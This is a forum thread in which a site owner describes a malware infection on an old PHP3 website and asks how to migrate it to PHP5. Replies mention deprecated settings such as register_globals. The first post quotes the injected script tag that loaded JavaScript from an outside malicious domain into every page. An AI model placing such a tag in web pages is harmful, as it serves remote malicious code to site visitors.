Hi Guys,

My background consists of HTML, CSS, Dreamweaver, ASP and MS access and SQL.
Unfortunately I have no experience with PHP.

Recently my friend's website (which was built by someone else in the past, uses PHP3 and MySQL) has become a victim of a malware attack where the below line of code has been written to every .php3 page in the site:
[FONT="Courier New"]<script src=http://www.movaddw.com/fgg.js></script></body>[/FONT]
There is an article about this here: http://infosec20.blogspot.com which I don't fully understand either. As a result my friend's adwords account with google has been suspended which is not good.

We got in touch with the support people who host the site, they advised us to
a) Remove the malicious line of code from each page and
b) Upgrade the site to php5

This is where I am now
a) I have removed the malicious line of code from all pages but
b) I have no idea what's involved in upgrading the site to PHP5!

I've opened the pages of the site in Dreamweaver and can see where 'php3' is mentioned in the code eg: include("settings.php3"); and the static links to the other pages like 'products.php3'.
After doing some googling on this I am beginning to think that a lot more advanced types of changes to the php3 code might be needed. This is where my confidence takes a dive.

I can see in the control panel where the site is hosted that the site is hosted on a server that uses PHP Version 4.4.7. There is also an option to request that the site be moved to a server that uses PHP Version 5.2.3

My question therefore is:
What exactly is involved and what do I need to when someone says "you need to update the code in all your .php3 pages to .php5"

I would be very grateful if any PHP gurus out there could offer assistance.
Thank you.

    It sounds as if the web host in question has multiple versions of PHP installed, probably PHP4 as the default as an Apache module, and PHP3 and PHP5 as CGI versions. If this is the case (and you may want to check with the host's support people or documentation), then changing the file suffixes to .php5 may in fact cause those files to be processed by the PHP5 parser/compiler.

    However, the "gotcha" will be whether or not those scripts use features which have been deprecated or depend upon configuration settings which are no longer activated by default ([man]register_globals[/man], [man]short_open_tag[/man], [man]magic_quotes[/man], and [man]session_register/man and its related functions, to name a few).

      Many thanks NogDog, you have been very helpful.
      It looks like the site should definetly be recoded/revamped to PHP5, or even PHP6.

      We will have to sit down and think this one through. Thanks again.

        4 years later

        hello everyone I am new user in this forum, I just want to information about how to convert PHP3 to PHP5, I am waiting for your response.

          The same way you convert a watercolor painting into an oil painting. You learn to draw using oil and then you look at the features of the watercolor painting and create those using the new technique.

            15 days later

            Many thanks ollielaroo..

            This is very helpful..

              Write a Reply...